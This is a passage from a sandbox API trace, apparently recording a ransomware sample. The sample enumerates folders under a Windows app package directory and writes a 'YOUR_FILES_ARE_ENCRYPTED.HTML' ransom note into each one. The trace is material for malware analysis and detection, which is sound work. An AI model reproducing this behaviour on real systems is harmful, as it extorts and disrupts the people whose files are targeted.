lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\AC", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\AC\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\AC\\*" [0115.306] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\AC\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x271e7d09, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x27470465, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x27470465, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187b70, dwReserved1=0x3187ac8, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0115.308] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x271e7d09, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x27470465, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x27470465, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187b70, dwReserved1=0x3187ac8, cFileName="..", cAlternateFileName="")) returned 1 [0115.308] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x271e7d09, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x271e7d09, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x271e7d09, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187b70, dwReserved1=0x3187ac8, cFileName="INetCache", cAlternateFileName="INETCA~1")) returned 1 [0115.308] StrStrIW (lpFirst="INetCache", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.308] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\AC\\INetCache") returned 96 [0115.309] GetProcessHeap () returned 0x600000 [0115.309] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0115.311] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\AC\\INetCache" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\AC\\INetCache") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\AC\\INetCache" [0115.311] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\AC\\INetCache", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\AC\\INetCache\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\AC\\INetCache\\*" [0115.311] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\AC\\INetCache\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x271e7d09, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x271e7d09, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x271e7d09, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f1368, dwReserved1=0x3187ad0, cFileName=".", cAlternateFileName="")) returned 0x626638 [0115.312] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x271e7d09, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x271e7d09, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x271e7d09, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f1368, dwReserved1=0x3187ad0, cFileName="..", cAlternateFileName="")) returned 1 [0115.312] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x271e7d09, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x271e7d09, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x271e7d09, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f1368, dwReserved1=0x3187ad0, cFileName="..", cAlternateFileName="")) returned 0 [0115.312] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0115.312] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\AC\\INetCache\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 126 [0115.312] GetProcessHeap () returned 0x600000 [0115.312] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0115.313] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\AC\\INetCache\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.bingsports_8wekyb3d8bbwe\\ac\\inetcache\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0115.314] WriteFile (in: hFile=0x324, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0115.315] CloseHandle (hObject=0x324) returned 1 [0115.315] GetProcessHeap () returned 0x600000 [0115.315] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0115.315] GetProcessHeap () returned 0x600000 [0115.315] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0115.316] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x271e7d09, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x271e7d09, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x271e7d09, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187b70, dwReserved1=0x3187ac8, cFileName="INetCookies", cAlternateFileName="INETCO~1")) returned 1 [0115.316] StrStrIW (lpFirst="INetCookies", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.316] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\AC\\INetCookies") returned 98 [0115.316] GetProcessHeap () returned 0x600000 [0115.316] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0115.318] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\AC\\INetCookies" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\AC\\INetCookies") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\AC\\INetCookies" [0115.318] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\AC\\INetCookies", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\AC\\INetCookies\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\AC\\INetCookies\\*" [0115.318] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\AC\\INetCookies\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x271e7d09, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x271e7d09, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x271e7d09, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f1368, dwReserved1=0x3187ad0, cFileName=".", cAlternateFileName="")) returned 0x6267b8 [0115.318] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x271e7d09, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x271e7d09, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x271e7d09, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f1368, dwReserved1=0x3187ad0, cFileName="..", cAlternateFileName="")) returned 1 [0115.318] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x271e7d09, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x271e7d09, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x271e7d09, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f1368, dwReserved1=0x3187ad0, cFileName="..", cAlternateFileName="")) returned 0 [0115.319] FindClose (in: hFindFile=0x6267b8 | out: hFindFile=0x6267b8) returned 1 [0115.319] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\AC\\INetCookies\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 128 [0115.319] GetProcessHeap () returned 0x600000 [0115.319] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0115.319] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\AC\\INetCookies\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.bingsports_8wekyb3d8bbwe\\ac\\inetcookies\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0115.320] WriteFile (in: hFile=0x324, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0115.321] CloseHandle (hObject=0x324) returned 1 [0115.321] GetProcessHeap () returned 0x600000 [0115.321] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0115.321] GetProcessHeap () returned 0x600000 [0115.321] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0115.321] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x271e7d09, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x271e7d09, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x271e7d09, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187b70, dwReserved1=0x3187ac8, cFileName="INetHistory", cAlternateFileName="INETHI~1")) returned 1 [0115.321] StrStrIW (lpFirst="INetHistory", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.322] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\AC\\INetHistory") returned 98 [0115.322] GetProcessHeap () returned 0x600000 [0115.322] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0115.322] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\AC\\INetHistory" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\AC\\INetHistory") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\AC\\INetHistory" [0115.322] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\AC\\INetHistory", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\AC\\INetHistory\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\AC\\INetHistory\\*" [0115.322] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\AC\\INetHistory\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x271e7d09, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x271e7d09, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x271e7d09, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f1368, dwReserved1=0x3187ad0, cFileName=".", cAlternateFileName="")) returned 0x626838 [0115.322] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x271e7d09, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x271e7d09, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x271e7d09, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f1368, dwReserved1=0x3187ad0, cFileName="..", cAlternateFileName="")) returned 1 [0115.322] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x271e7d09, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x271e7d09, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x271e7d09, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f1368, dwReserved1=0x3187ad0, cFileName="..", cAlternateFileName="")) returned 0 [0115.322] FindClose (in: hFindFile=0x626838 | out: hFindFile=0x626838) returned 1 [0115.322] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\AC\\INetHistory\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 128 [0115.322] GetProcessHeap () returned 0x600000 [0115.322] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0115.322] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\AC\\INetHistory\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.bingsports_8wekyb3d8bbwe\\ac\\inethistory\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0115.323] WriteFile (in: hFile=0x324, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0115.325] CloseHandle (hObject=0x324) returned 1 [0115.339] GetProcessHeap () returned 0x600000 [0115.339] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0115.339] GetProcessHeap () returned 0x600000 [0115.339] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0115.340] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x271e7d09, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x271e7d09, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x271e7d09, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187b70, dwReserved1=0x3187ac8, cFileName="Temp", cAlternateFileName="")) returned 1 [0115.340] StrStrIW (lpFirst="Temp", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.340] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\AC\\Temp") returned 91 [0115.340] GetProcessHeap () returned 0x600000 [0115.340] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0115.342] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\AC\\Temp" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\AC\\Temp") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\AC\\Temp" [0115.342] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\AC\\Temp", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\AC\\Temp\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\AC\\Temp\\*" [0115.342] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\AC\\Temp\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x271e7d09, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x271e7d09, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x271e7d09, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f1368, dwReserved1=0x3187ad0, cFileName=".", cAlternateFileName="")) returned 0x626778 [0115.342] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x271e7d09, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x271e7d09, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x271e7d09, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f1368, dwReserved1=0x3187ad0, cFileName="..", cAlternateFileName="")) returned 1 [0115.342] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x271e7d09, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x271e7d09, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x271e7d09, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f1368, dwReserved1=0x3187ad0, cFileName="..", cAlternateFileName="")) returned 0 [0115.342] FindClose (in: hFindFile=0x626778 | out: hFindFile=0x626778) returned 1 [0115.342] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\AC\\Temp\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 121 [0115.342] GetProcessHeap () returned 0x600000 [0115.342] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0115.343] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\AC\\Temp\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.bingsports_8wekyb3d8bbwe\\ac\\temp\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0115.344] WriteFile (in: hFile=0x324, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0115.345] CloseHandle (hObject=0x324) returned 1 [0115.345] GetProcessHeap () returned 0x600000 [0115.345] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0115.346] GetProcessHeap () returned 0x600000 [0115.346] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0115.347] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x271e7d09, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x271e7d09, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x271e7d09, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187b70, dwReserved1=0x3187ac8, cFileName="Temp", cAlternateFileName="")) returned 0 [0115.347] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0115.347] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\AC\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 116 [0115.347] GetProcessHeap () returned 0x600000 [0115.347] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0115.348] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\AC\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.bingsports_8wekyb3d8bbwe\\ac\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0115.348] WriteFile (in: hFile=0x214, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0115.350] CloseHandle (hObject=0x214) returned 1 [0115.350] GetProcessHeap () returned 0x600000 [0115.350] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0115.350] GetProcessHeap () returned 0x600000 [0115.350] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0115.350] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2714f314, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2714f314, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2714f314, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="AppData", cAlternateFileName="")) returned 1 [0115.350] StrStrIW (lpFirst="AppData", 